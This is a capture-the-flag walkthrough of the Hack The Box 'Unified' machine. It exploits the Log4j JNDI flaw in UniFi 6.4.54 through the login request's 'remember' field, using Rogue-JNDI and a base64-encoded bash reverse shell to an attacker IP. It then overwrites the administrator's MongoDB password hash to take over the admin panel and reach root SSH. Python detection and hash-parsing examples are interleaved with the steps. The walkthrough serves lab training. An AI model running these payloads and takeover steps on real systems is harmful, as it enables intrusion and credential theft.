#15 Unified - Starting Point - Hack The Box || Complete Walkthrough

This write-up explores the effects of exploiting Log4J in a very well-known network appliance monitoring system called "UniFi". 

This box will show you how to set up and install the packages and tools needed to exploit UniFi by abusing the Log4j vulnerability and manipulating a POST parameter called remember, which gives you a reverse shell on the machine. You'll also change the administrator's password by altering the hash saved in the MongoDB instance running on the system, which grants access to the administration panel and leads to the disclosure of the administrator's SSH password.


Enumeration

Click on Spawn Machine to get the target IP address:



Network scan using Nmap

The first step is to scan the target IP address with Nmap to check what ports are open. Here is a quick explanation of what each flag is and what it does.

  • -sC: Performs a script scan using the default set of scripts
  • -sV: Version detection

┌─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 10.129.73.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-18 04:08 IST
Nmap scan report for 10.129.73.156
Host is up (0.42s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Thu, 17 Feb 2022 17:10:01 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
|     Found</h1></body></html>
|   GetRequest: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Thu, 17 Feb 2022 17:09:47 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Thu, 17 Feb 2022 17:09:52 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 17 Feb 2022 17:09:55 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|     Request</h1></body></html>
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 17 Feb 2022 17:10:03 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Did not follow redirect to https://10.129.73.156:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open  ssl/nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=2/18%Time=620ECEB5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080
SF:/manage\r\nContent-Length:\x200\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x
SF:2017:09:47\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"H
SF:TTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCon
SF:tent-Length:\x200\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x2017:09:52\x20
SF:GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x204
SF:00\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:
SF:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2017\x20Feb\x202022\
SF:x2017:09:55\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><ht
SF:ml\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x2
SF:0Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family
SF::Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;ba
SF:ckground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size
SF::16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{c
SF:olor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:n
SF:one;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\
SF:x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langu
SF:age:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Thu,\x2017\x20Feb\x202
SF:022\x2017:10:01\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html
SF:><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x9
SF:3\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x
SF:20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\
SF:r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\
SF:r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x2017:1
SF:0:03\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x2
SF:0Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma
SF:,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgroun
SF:d-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</
SF:style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.24 seconds
┌─[mrdev@TS]─[~]
└──╼ $

The scan reveals port 8080 open running an HTTP proxy. The proxy redirects requests to port 8443, which appears to be running an SSL web server. We take note that the HTTP title of the page on port 8443 is "UniFi Network".

http://{Target IP}:8080/

Upon accessing the page in a browser we are presented with the UniFi web portal login page, which shows the version number 6.4.54. Whenever we come across a version number it is a good idea to research that particular version on Google.


Exploiting UniFi 6.4.54 with Log4j Vulnerability

A quick Google search using the keywords "UniFi 6.4.54 exploit" reveals an article that discusses the in-depth exploitation of the CVE-2021-44228 vulnerability within this application. 

  • Learn More: Another Log4j on the Fire: Unifi

This resource provides insights into the Log4j vulnerability's impact on the Unifi platform. It discusses the vulnerability's exploitation, its implications for Unifi users, and recommendations for mitigating the risk.


This Log4j vulnerability can be exploited to inject operating system commands (OS command injection), a web security vulnerability that allows an attacker to execute arbitrary operating system commands on the server running the application, typically leading to full compromise of the application and all of its data.

To determine if this is the case, we make a POST request to the /api/login endpoint and use FoxyProxy to pass the request on to Burp Suite, which intercepts it as a man-in-the-middle. The request can then be edited to inject commands. We provide a great module based on intercepting web requests.

First, we attempt to log in to the page with test credentials, since we aren't trying to validate them or gain access. The login request will be captured by Burp Suite and we will be able to modify it.

Before we modify the request, let's send this HTTPS packet to the Repeater module of BurpSuite by pressing CTRL+R.



Gaining Reverse Shell through JNDI:LDAP Exploitation

The Exploitation section of the previously mentioned article states that we have to place our payload in the remember parameter. Because the POST data is sent as a JSON object and the payload contains curly braces {}, we enclose it in double quotes " so that it is parsed as a string rather than as another JSON object.

We input the payload into the remember field as shown above so that we can identify an injection point if one exists. If the request causes the server to connect back to us, then we have verified that the application is vulnerable.

"${jndi:ldap://{tun0 IP}:1389/o=tomcat}"

  • JNDI is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
  • LDAP is the acronym for Lightweight Directory Access Protocol, an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over an IP network. The default port that LDAP runs on is port 389.

After we hit "send" the "Response" pane will display the response from the request. The output shows us an error message stating that the payload is invalid, but despite the error message the payload is actually being executed. 
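From the defender's side, the same payload is what a request-inspection rule has to catch before it ever reaches Log4j. The following is an added example (not code from the walkthrough, UniFi or Log4j) that scans the JSON body of a login request for JNDI lookups. It also collapses the nested lookups Log4j evaluates first, such as ${lower:j}, because a check that only greps for the literal "${jndi:" misses those. The sample bodies are constructed; 10.0.0.1 is a placeholder address.

```python
"""Detect Log4Shell-style JNDI lookups in HTTP request bodies.

Added example, not code from the walkthrough or from UniFi/Log4j.
Constructed sample bodies: the first mirrors the injection into the
`remember` field of /api/login; 10.0.0.1 is a placeholder address.
"""
import json
import re

SAMPLE_BODIES = [
    '{"username":"test","password":"test","remember":"${jndi:ldap://10.0.0.1:1389/o=tomcat}","strict":true}',
    '{"username":"test","password":"test","remember":false,"strict":true}',
    # Nested lookup: Log4j resolves ${lower:j} to "j" before the JNDI call,
    # so a detector that only greps for the literal "${jndi:" misses it.
    '{"username":"${${lower:j}ndi:ldap://10.0.0.1:1389/o=tomcat}","password":"x"}',
]

# Innermost nested lookups that Log4j evaluates before the outer ${jndi:...}:
# ${lower:X} / ${upper:X} -> X, and ${name:-X} (default-value syntax) -> X.
_NESTED = [
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE),
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),
]
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+):")


def normalize(value: str) -> str:
    """Collapse nested lookups until the string stops changing, then lower-case."""
    previous = None
    while previous != value:
        previous = value
        for pattern in _NESTED:
            value = pattern.sub(lambda m: m.group(1), value)
    return value.lower()


def find_jndi_lookups(text: str) -> list:
    """Return the JNDI scheme (ldap, rmi, ...) of every lookup found in text."""
    return _JNDI.findall(normalize(text))


def _strings(obj, path=""):
    """Yield (json_path, value) for every string nested anywhere in a JSON value."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from _strings(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from _strings(val, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_login_request(body: str) -> dict:
    """Map each JSON field carrying a JNDI lookup to the schemes it uses.

    A body that is not valid JSON is still scanned as raw text so that a
    malformed request cannot slip past the check.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        schemes = find_jndi_lookups(body)
        return {"<raw>": schemes} if schemes else {}
    hits = {}
    for path, value in _strings(data):
        schemes = find_jndi_lookups(value)
        if schemes:
            hits[path] = schemes
    return hits


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(scan_login_request(body) or "clean")
```

Matching on the normalized string rather than the raw bytes is the important design choice: the detector sees what Log4j would see after substitution, which is also why the quoting trick described above (the payload being a JSON string) makes no difference to it.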

Let's proceed to start tcpdump on port 389, which will monitor the network traffic for LDAP connections.


Analyzing network traffic using tcpdump

Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

Open up another terminal and type:

┌─[mrdev@TS]─[~]
└──╼ $ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

The above syntax can be broken down as follows:

  • sudo: Run the command as root, the administrative user.
  • tcpdump: The packet capture program, essentially a command-line counterpart to Wireshark.
  • -i: Select the capture interface (for example eth0, wlan0 or tun0).
  • port 389: Capture only traffic to or from port 389, the port we are listening on.

After tcpdump has been started, click the Send button in Burp Suite again:

The tcpdump output shows a connection being received on our machine. 

┌─[mrdev@TS]─[~]
└──╼ $ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:45:17.078464 IP 10.129.73.156.59302 > 10.10.14.36.ldap : Flags [S], seq 1538469668, win 64240, options [mss 1285,sackOK,TS val 330865588 ecr 0,nop,wscale 7], length 0
05:45:17.078517 IP 10.10.14.36.ldap > 10.129.73.156.59302: Flags [R.], seq 0, ack 1538469669, win 0, length 0
^C
2 packets captured
2 packets received by filter
0 packets dropped by kernel
┌─[mrdev@TS]─[~]
└──╼ $

This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.
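The same capture read from the other side is a detection signal: a server that initiates an outbound connection to an LDAP port has performed a JNDI lookup, whether or not anything answers. The following is an added example (not code from the walkthrough or from tcpdump) that parses tcpdump lines of the form shown above and flags SYN packets sent by the application server to LDAP-related ports. The first two sample lines reproduce the capture above; the third is a constructed benign control, and the set of ports to watch (389, 636 and 1389) is an assumption.

```python
"""Flag server-initiated LDAP connection attempts in tcpdump output.

Added example, not code from the walkthrough or from tcpdump. The first two
sample lines reproduce the capture shown in the walkthrough; the third is a
constructed benign control. The watched ports are an assumption: 389/636 for
LDAP/LDAPS and 1389, the port Rogue-JNDI listens on.
"""
import re

SAMPLE_LINES = [
    "05:45:17.078464 IP 10.129.73.156.59302 > 10.10.14.36.ldap : Flags [S], seq 1538469668, win 64240, options [mss 1285,sackOK,TS val 330865588 ecr 0,nop,wscale 7], length 0",
    "05:45:17.078517 IP 10.10.14.36.ldap > 10.129.73.156.59302: Flags [R.], seq 0, ack 1538469669, win 0, length 0",
    # Constructed control line: an ordinary inbound HTTPS handshake to the server.
    "05:45:20.000000 IP 10.10.14.36.51000 > 10.129.73.156.8443: Flags [S], seq 1, win 64240, length 0",
]

# tcpdump prints "host.port" and substitutes service names unless -n is given.
_SERVICE_PORTS = {"ldap": 389, "ldaps": 636}
JNDI_CALLBACK_PORTS = {389, 636, 1389}

# "<time> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>], ..."; the \s* before
# the colon tolerates the stray space seen in the capture above.
_LINE = re.compile(
    r"^(?P<time>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\w+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\w+)\s*: Flags \[(?P<flags>[^\]]+)\]"
)


def _port_number(token: str):
    """Turn a numeric port or a service name from tcpdump into an integer."""
    return int(token) if token.isdigit() else _SERVICE_PORTS.get(token)


def parse_line(line: str):
    """Parse one tcpdump TCP line into a dict, or return None if it does not match."""
    match = _LINE.match(line)
    if match is None:
        return None
    record = match.groupdict()
    for key in ("sport", "dport"):
        record[key] = _port_number(record[key])
    return record


def find_outbound_callbacks(lines, server_ip, watch_ports=JNDI_CALLBACK_PORTS):
    """Return parsed SYN packets sent *by* server_ip to a watched port.

    A SYN (Flags [S]) from the application server towards an LDAP port is the
    connect-back signature of a JNDI lookup, regardless of whether the remote
    side completes the handshake (in the capture above it answers with RST).
    """
    hits = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        if (record["src"] == server_ip and record["flags"] == "S"
                and record["dport"] in watch_ports):
            hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in find_outbound_callbacks(SAMPLE_LINES, "10.129.73.156"):
        print(f"{hit['time']} {hit['src']} -> {hit['dst']}:{hit['dport']} (SYN)")
```

Running tcpdump with -n would print 389 instead of ldap; the parser accepts both forms so the rule does not depend on how the capture was taken.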


Rogue-JNDI Remote Code Execution

We will have to install Open-JDK and Maven on our system in order to build a payload that we can send to the server which will give us Remote Code Execution on the vulnerable system.

Open-JDK is the Java Development Kit, which is used to build Java applications. Maven on the other hand is an Integrated Development Environment (IDE) that can be used to create a structured project and compile our projects into jar files.

OpenJDK comes pre-installed on Parrot and Kali; if it is missing, install it with:

sudo apt-get update
sudo apt-get install openjdk-11-jdk -y    # To Install Java 11

java --version      # Run this command to verify if java exists or not

These applications will also help us run the rogue-JNDI Java application, which starts a local LDAP server and allows us to receive connections back from the vulnerable server and execute malicious code. 

Once we have installed Open-JDK, we can proceed to install Maven. But first, let’s switch to the root user.

sudo apt-get install maven  # To install the Maven utility tool

Once we have installed the required packages, we now need to download and build the Rogue-JNDI Java application. Let's clone the respective repository and build the package using Maven.

┌─[mrdev@TS]─[~]
└──╼ $ git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi

Run the command to build the package using Maven:

┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ sudo mvn package
[INFO] Scanning for projects...
[INFO] 
[INFO] ------------------------< RogueJndi:RogueJndi >-------------------------
[INFO] Building RogueJndi 1.1
[INFO] --------------------------------[ jar ]---------------------------------
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom (8.1 kB at 2.2 kB/s)
<SNIP>
[INFO] Including org.apache.commons:commons-lang3:jar:3.9 in the shaded jar.
[INFO] Replacing original artifact with shaded artifact.
[INFO] Replacing /home/mrdev/rogue-jndi/target/RogueJndi-1.1.jar with /home/mrdev/rogue-jndi/target/RogueJndi-1.1-shaded.jar
[INFO] Dependency-reduced POM written at: /home/mrdev/rogue-jndi/dependency-reduced-pom.xml
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  06:19 min
[INFO] Finished at: 2022-02-18T06:03:17+05:30
[INFO] ------------------------------------------------------------------------
┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $

This will create a .jar file in the rogue-jndi/target/ directory called RogueJndi-1.1.jar. Now we can construct our payload to pass into the RogueJndi-1.1.jar Java application.

To use the Rogue-JNDI server we will have to construct and pass it a payload, which will be responsible for giving us a shell on the affected system. We will Base64-encode the payload to prevent any encoding issues.

Note: For this walkthrough, we will be using port 4444 to receive the shell.

┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ echo 'bash -c bash -i >&/dev/tcp/10.10.14.36/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMzYvNDQ0NCAwPiYxCg==
┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $

After the payload has been created, start the Rogue-JNDI application while passing in the payload as part of the --command option and your tun0 IP address to the --hostname option. 

┌─[✗]─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMzYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.36"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.36:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.36:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.36:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.36:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.36:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.36:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.36:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.36:1389/o=groovy to artsploit.controllers.Groovy
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

Now that the server is listening locally on port 1389, let's open another terminal and start a Netcat listener to capture the reverse shell.

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...

Go back to the intercepted POST request in Burp Suite and click Send.

Once we receive the output from the Rogue server, a shell spawns on our Netcat listener:

┌─[mrdev@TS]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.73.156] 49672
script /dev/null -c bash    # Upgrade the Terminal Shell that will allow us to interact with the system more  effectively
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$ id
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
unifi@unified:/usr/lib/unifi$ cat /home/michael/user.txt   # navigate to /home/Michael/ and read the user flag.
cat /home/michael/user.txt
6*****************************7
unifi@unified:/usr/lib/unifi$ 


Privilege Escalation

Now, we can get access to the administrator panel of the UniFi application and possibly extract SSH secrets used between the appliances.

UniFi Administrator Panel Exploitation for SSH Access

First let's check if MongoDB is running on the target system, which might make it possible for us to extract credentials in order to log in to the administrative panel.

unifi@unified:/usr/lib/unifi$ ps aux | grep mongo
ps aux | grep mongo
unifi         67  0.4  4.1 1104772 85176 ?       Sl   17:08   0:38 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       4122  0.0  0.0  11468  1008 pts/0    S+   19:32   0:00 grep mongo
unifi@unified:/usr/lib/unifi$

We can see MongoDB is running on the target system on port 27117, bound to 127.0.0.1 only.

Let's interact with the MongoDB service by making use of the Mongo command-line utility and attempting to extract the administrator password.

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : " administrator ",
"email" : "[email protected]",
"x_shadow" : " $6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4. ",
"time_created" : NumberLong(1640900495),
"last_site_name" : "default",
"ui_settings" : {
<MORE>
unifi@unified:/usr/lib/unifi$

The output reveals a user called administrator. Their password hash is stored in the x_shadow field, but in this instance it cannot be cracked with any password-cracking utility. Instead, we can replace the x_shadow hash with one we generate ourselves, which effectively sets the administrator's password and lets us authenticate to the administrative panel. To do this we can use the mkpasswd command-line utility.

Open a new terminal and type the below command:

┌─[mrdev@TS]─[~]
└──╼ $ mkpasswd -m sha-512 technoscience      # Instead of technoscience change to new password
$6$wxJKtlbnsXvPeyv.$eH8MH1mkoK.Dtogovb60jvIzrRLEgpTVUJe30K5jOmrJayQoSNhDTkzRGLdE/KvsVq.H7R3BBXUQIh6LvmP1k1
┌─[mrdev@TS]─[~]
└──╼ $

Once we've generated the SHA-512 hash, the output will look similar to the one above; however, because of the salt, the hash changes every time it is generated.

A salt is random data added to the hashing process so that identical passwords produce different hashes. It makes each hash unique and increases the attacker's work without adding any burden on the user, and it defeats precomputed attacks such as hash tables.
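To make the salt behaviour concrete, here is an added example (not code from the walkthrough or from mkpasswd) that parses the $6$salt$digest string mkpasswd produced above into its fields and then demonstrates salted hashing and verification. sha512-crypt itself is not in Python's standard library (the crypt module was removed in Python 3.13), so PBKDF2-HMAC-SHA512 from hashlib stands in for the salted-hash demonstration; the two hashes embedded in the code are the ones shown on this page.

```python
"""Salted password hashes: parsing mkpasswd output and demonstrating salting.

Added example, not code from the walkthrough or from mkpasswd. sha512-crypt is
not in Python's standard library (the crypt module was removed in 3.13), so
PBKDF2-HMAC-SHA512 stands in to show why two hashes of the same password
differ and how verification still works with the stored salt.
"""
import hashlib
import hmac
import os

# Hash copied from the mkpasswd output above (password "technoscience").
MKPASSWD_HASH = ("$6$wxJKtlbnsXvPeyv.$eH8MH1mkoK.Dtogovb60jvIzrRLEgpTVUJe30K5jOmrJayQo"
                 "SNhDTkzRGLdE/KvsVq.H7R3BBXUQIh6LvmP1k1")
# Hash copied from the x_shadow field of the MongoDB output above.
MONGO_HASH = ("$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4Wc"
              "TQFN1CRk3GwQaquyVwCVq8iQgPTt4.")

_CRYPT_IDS = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt"}


def parse_crypt_hash(value: str) -> dict:
    """Split a modular-crypt string "$id$[rounds=N$]salt$digest" into its fields."""
    parts = value.strip().split("$")
    if len(parts) < 4 or parts[0] != "":
        raise ValueError("not a $id$salt$digest string")
    ident, rest = parts[1], parts[2:]
    rounds = 5000                       # glibc default for sha256/sha512-crypt
    if rest[0].startswith("rounds="):
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    if len(rest) != 2:
        raise ValueError("unexpected number of fields")
    salt, digest = rest
    return {"algorithm": _CRYPT_IDS.get(ident, "unknown"), "rounds": rounds,
            "salt": salt, "digest": digest}


def hash_password(password: str, salt: bytes = None, rounds: int = 200_000) -> str:
    """Return "$pbkdf2-sha512$rounds$salt_hex$digest_hex", using a fresh random salt by default."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, rounds)
    return f"$pbkdf2-sha512${rounds}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _, scheme, rounds, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2-sha512":
        raise ValueError("unsupported scheme")
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for label, value in (("mkpasswd", MKPASSWD_HASH), ("mongo", MONGO_HASH)):
        print(label, parse_crypt_hash(value))
    first, second = hash_password("technoscience"), hash_password("technoscience")
    print("different hashes:", first != second)
    print("both verify:", verify_password("technoscience", first)
          and verify_password("technoscience", second))
```

The verification path is what UniFi does at login: it reads the salt out of the stored string, hashes the submitted password with that salt, and compares. That is why any well-formed $6$ string written into x_shadow is accepted as the new password, and why the two hashes on this page can have salts of different lengths (8 and 16 characters) yet be handled by the same code.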

Let's proceed to replace the existing hash with the one we created:

mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$wxJKtlbnsXvPeyv.$eH8MH1mkoK.Dtogovb60jvIzrRLEgpTVUJe30K5jOmrJayQoSNhD<go --port 27117 ace --eval 'db.admin.update({"_id":
<OmrJayQoSNhDTkzRGLdE/KvsVq.H7R3BBXUQIh6LvmP1k1"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
unifi@unified:/usr/lib/unifi$

Let's now visit the website and log in as administrator. It is very important to note that the username is case-sensitive.

The authentication process was successful and we now have administrative access to the UniFi application.

UniFi offers a setting for SSH Authentication, which is a functionality that allows you to administer other Access Points over SSH from a console or terminal.

Navigate to Settings -> Site and scroll down to find the SSH Authentication setting. SSH authentication with a root password has been enabled.

The page shows the root password in plaintext. Let's attempt to authenticate to the system as root over SSH. 

┌─[mrdev@TS]─[~]
└──╼ $ ssh root@10.129.73.156
root@10.129.73.156's password: 
